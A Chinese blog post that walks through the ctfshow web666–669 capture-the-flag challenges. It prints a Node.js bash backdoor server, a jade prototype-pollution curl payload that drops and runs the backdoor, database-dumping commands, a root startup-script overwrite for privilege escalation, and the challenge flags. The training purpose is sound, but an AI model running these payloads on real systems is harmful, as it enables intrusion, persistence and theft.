ctfshow终极考核 web66⑥-web669

最新推荐文章于 2023-09-20 20:27:16 发布
最新推荐文章于 2023-09-20 20:27:16 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: CTFSHOW web入门系列 文章标签: list
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/121611613
版权
本文详细介绍了如何利用JavaScript原型链污染进行远程代码执行(RCE)。通过构造特定的请求,可以执行任意命令,如在目标系统上创建文件、执行SQL查询等。此外,还展示了如何通过修改启动脚本来持久化攻击,从而获取系统权限。这些漏洞通常出现在Web应用程序中,提醒开发者注意代码安全性,避免此类攻击。
摘要由CSDN通过智能技术生成

配合脚本学习效果更好

web666

可以先看下668
先通过js rce ,然后又拿的flag,flag在数据库中

web667

扫描端口可以找到
3000端口
flag_667=ctfshow{503a075560764e3d116436ab73d7a560}

web668

通过jade原型链污染写入一个nodejs,并且运行
jade原型链污染可以看下这篇文章
https://blog.csdn.net/miuzzx/article/details/111780832
写入的nodejs内容如下

var http = require('http');
var querystring = require('querystring');

var postHTML = '123';

http.createServer(function (req, res) {
  var body = "";
  req.on('data', function (chunk) {
    body += chunk;
  });
  req.on('end', function () {
    body = querystring.parse(body);
    res.writeHead(200, {'Content-Type': 'text/html; charset=utf8'});
 try{
    if(body.cmd) {
        res.write("username:" + body.cmd);
        var result= global.process.mainModule.constructor._load('child_process').execSync('bash -c "'+body.cmd+'"').toString();
        res.write(result);
    } else {
        res.write(postHTML);
    }}
    catch{
       res.write(postHTML);
    }
    res.end();
  });
}).listen(8033);

但是直接写生成文件的命令不知道为啥有问题,所以转了下base64

curl -i -X POST -H 'Content-type':'application/json' -d "{\\"__proto__\\":{\\"__proto__\\": {\\"type\\":\\"Block\\",\\"nodes\\":\\"\\",\\"compileDebug\\":1,\\"self\\":1,\\"line\\":\\"global.process.mainModule.require('child_process').exec('echo YmFzaCAtYyAiZWNobyBkbUZ5SUdoMGRIQWdQU0J5WlhGMWFYSmxLQ2RvZEhSd0p5azdDblpoY2lCeGRXVnllWE4wY21sdVp5QTlJSEpsY1hWcGNtVW9KM0YxWlhKNWMzUnlhVzVuSnlrN0NncDJZWElnY0c5emRFaFVUVXdnUFNBbk1USXpKenNLSUFwb2RIUndMbU55WldGMFpWTmxjblpsY2lobWRXNWpkR2x2YmlBb2NtVnhMQ0J5WlhNcElIc0tJQ0IyWVhJZ1ltOWtlU0E5SUNJaU93b2dJSEpsY1M1dmJpZ25aR0YwWVNjc0lHWjFibU4wYVc5dUlDaGphSFZ1YXlrZ2V3b2dJQ0FnWW05a2VTQXJQU0JqYUhWdWF6c0tJQ0I5S1RzS0lDQnlaWEV1YjI0b0oyVnVaQ2NzSUdaMWJtTjBhVzl1SUNncElIc0tJQ0FnSUdKdlpIa2dQU0J4ZFdWeWVYTjBjbWx1Wnk1d1lYSnpaU2hpYjJSNUtUc0tJQ0FnSUhKbGN5NTNjbWwwWlVobFlXUW9NakF3TENCN0owTnZiblJsYm5RdFZIbHdaU2M2SUNkMFpYaDBMMmgwYld3N0lHTm9ZWEp6WlhROWRYUm1PQ2Q5S1RzS0lIUnllWHNLSUNBZ0lHbG1LR0p2WkhrdVkyMWtLU0I3Q2lBZ0lDQWdJQ0FnY21WekxuZHlhWFJsS0NKMWMyVnlibUZ0WmUrOG1pSWdLeUJpYjJSNUxtTnRaQ2s3Q2lBZ0lDQWdJQ0FnZG1GeUlISmxjM1ZzZEQwZ1oyeHZZbUZzTG5CeWIyTmxjM011YldGcGJrMXZaSFZzWlM1amIyNXpkSEoxWTNSdmNpNWZiRzloWkNnblkyaHBiR1JmY0hKdlkyVnpjeWNwTG1WNFpXTlRlVzVqS0NkaVlYTm9JQzFqSUNJbksySnZaSGt1WTIxa0t5Y2lKeWt1ZEc5VGRISnBibWNvS1RzS0lDQWdJQ0FnSUNCeVpYTXVkM0pwZEdVb2NtVnpkV3gwS1RzS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdjbVZ6TG5keWFYUmxLSEJ2YzNSSVZFMU1LVHNLSUNBZ0lIMTlDaUFnSUNCallYUmphSHNLSUNBZ0lDQWdJSEpsY3k1M2NtbDBaU2h3YjNOMFNGUk5UQ2s3SUFvZ0lDQWdmUW9nSUNBZ2NtVnpMbVZ1WkNncE93b2dJSDBwT3dwOUtTNXNhWE4wWlc0b09EQXpNeWs3Q2c9PXxiYXNlNjQgLWQgPiAvaG9tZS9ub2RlL2FhLmpzO25vZGUgL2hvbWUvbm9kZS9hYS5qcyI=|base64 -d|bash')\\"}}}" http://'''+ip2+''':3000/login`;

生成之后可以直接利用rce

1=echo `curl -X POST -d "cmd=mysql -uroot -proot -e 'use ctfshow;select * from ctfshow_secret'" http://172.2.44.5:8033`;

1=echo `curl -X POST -d "cmd=mysql -uroot -proot -e 'use ctfshow;select * from ctfshow_secret'" http://172.2.44.5:8033`;

flag_668=ctfshow{5b617bd75e1242ab1f6f70437bb71dd5}

web669

通过ps -a命令看到root正在运行一个sh文件,而且我们是可以打开的
在这里插入图片描述
内容如下
在这里插入图片描述
每隔一分钟会运行node下的一个sh文件,那么我们只需要修改下这个node文件的内容就可以了。
先删除掉,在重新写个内容。

1=echo curl -X POST -d "cmd=rm -rf nodestartup.sh;echo 'cat /root/* > /home/node/a.txt ' > nodestartup.sh" http://172.2.132.5:8033;

flag_669ctfshow{a6c74ca12174eb538a4c8c8ed99c3a74}

yu22x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 命令执行 web66
Kradress的博客
12-03 330
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow 终极考核
qq_53263789的博客
07-21 1375
ctfshow
CTFshow_终极考核_EXP
ScyLamb的博客
01-05 1003
EXP ALL IN HERE exp exp exp ヾ(・ω・`。) import requests import base64 import re import time def getShell(url): burp0_url = url + "system36d/users.php?action=upload" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Us
ctfshow终极考核 web654 第一台靶机提权
qq_29851215的博客
07-24 1119
ctfshow终极考核 第一台靶机提权
ctfshow终极考核(一键通关脚本)
羽的博客
01-03 2832
import requests import re import time import base64 import urllib url="http://f1439852-cccf-43e8-a496-fdfe1c9eebd9.challenge.ctf.show/" sess=requests.session() #web640 print(re.findall('flag.*?=ctfshow{.*?}',requests.get(url).text)[0]) #web641 print(sess.
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
最新发布
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
CTFshow_终极考核_个人WP
ScyLamb的博客
01-05 5790
CTFshow_终极考核 参考 不打算参考 0x00 web640 flag_640=ctfshow{060ae7a27d203604baeb125f939570ef} 这里就陆陆续续记录些杂乱的做题笔记吧 做之前提醒自己 信息收集 后果必有前因 640前端发现可疑路径 system36d PHP/7.3.22 nginx/1.21.1 ] [10:52:15] 200 - 43B - /.bowerrc [10:53:35] 200 - 34B - /.gitign
ctfshow终极考核wp
Lum1n0us's Blog
01-17 3495
文章目录web640web641web642web643web644web645web646 web640 打开页面就能看到flag ctfshow{060ae7a27d203604baeb125f939570ef} web641 抓取首页的包,看到有一个Flag字段 ctfshow{affac61c787a82cc396585bea8ecf2dc} web642 在上面包里的源码看到css路径不寻常/system36d/static/css/start.css,在url后添加/system36d,抓包
[ctfshow]终极考核wp
cosmoslin的博客
07-07 1836
页面明文flag首页http头首页查看源码,发现可疑路径 访问,需要登录,抓包得到flag进入登陆页面需要输入密码开门,查看js文件,发现密码为输入密码后得到flag备份数据,数据中存在flag在网络测试功能当中可以执行命令,抓包修改测试命令为ls发现,访问得到一串url编码解码得到flag在系统更新处填入645的flag,进行权限验证后远程更新此时抓一下远程更新的包这里存在远程请求文件,很像文件包含,尝试读一下文件确实可以,我们依次读取一下web 643中得到的文件 最终flag在当中 利用数组绕
ctfshow终极考核web655-web665
羽的博客
01-03 1495
web655 打开/etc/host得到内网地址,遍历一遍发现.5的存活e 后台扫描发现有phpinfo.php www.zip robots.txt 访问phpinfo.php直接拿到flag flag_655=ctfshow{aada21bce99ddeab20020ac714686303} create function sys_eval returns string soname ‘b.so’; select sys_eval(‘whoami’); web656 提示xss,审计index.php
ctfshow终极考核
网安菜鸡学习笔记
05-24 86
信息收集 这个环境就只涉及目录扫描了 [18:04:02] 200 - 43B - /.bowerrc [18:04:03] 200 - 34B - /.gitignore [18:04:04] 200 - 2KB - /.travis.yml [18:04:24] 200 - 3KB - /page.php [18:04:28] 200 - 19B - /ro...
ctfshow-终极考核 WEB640-650
ce666666的博客
01-05 840
前言 对自己基础的检验,不会的知识点再查看其他师傅的WP学习学习,再加深学习。 感谢出这个系列的大佬,非常细节。 题目 WEB640 页面提示 WEB641 http头信息泄露 打开f12,查看网络流量,得到flag web642 敏感目录泄露 WEB643 先跳转到web644。 来到一个全新的页面,估计会有SQL注入、RCE、提权相关的基础知识。 抓包将whoami改为ls,即可查看文件。发现可疑文件secret.txt,进入URL解码,得到flag。 WEB644 这里就得看js了,有密码
ctfshow终极考核web640-web653
羽的博客
01-03 1436
ctfshow终极考核 web640 直接给了 web641 在请求头中 web642 web643 通过网络测试功能调用ls命令看到secret.txt,访问后url解码得到flag web644 首页css中存在路径 访问后跳转到登录界面 查看js得到flag以及登录的密码(0x36d) web645 备份功能下载下来后可以看到flag ...
ctfshow终极考核web654
羽的博客
08-01 926
web654 上传上去木马后进行udf提权 参考文章 so文件下载地址 提取码: pgns 因为不好直接上传so文件,可以先将他在本地base64编码 cat a.so |base64 然后把输出的内容复制下来可能有换行需要给去掉 echo "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA0AwAAAAAAABAAAAAAAAAAOgYAAAAAAAAAAAAAEAAOAAFAEAAGgAZAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBU
ctfshow web66
m0_69289738的博客
09-20 100
var_dump(scandir('.'))查看当前的目录。发现代码是可以执行的,但是flag文件不在这。先尝试一下highlight_file()发现目标文件,直接访问得flag。
ctfshow web670
08-13
- *1* [ctfshow终极考核 web66-web669](https://blog.csdn.net/miuzzx/article/details/121611613)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值